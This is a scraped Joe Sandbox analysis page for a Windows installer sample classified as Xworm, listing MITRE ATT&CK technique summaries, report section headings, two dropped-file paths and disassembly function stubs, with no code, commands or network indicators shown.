Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 33-o_Installer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Downloads\ind.cod

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33[1].ccp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Windows Analysis Report
33-o_Installer.exe

Function 00DC11E1 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 89
filesleepmemoryCOMMON

Function 00DC2E5D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
networkfileCOMMON

Function 00DC2E58 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
networkfileCOMMON

Function 0336FFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Function 00DC297F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Function 033700CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Function 00DC2F3D Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23
memoryCOMMON

Function 0336FB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Function 00DC5902 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE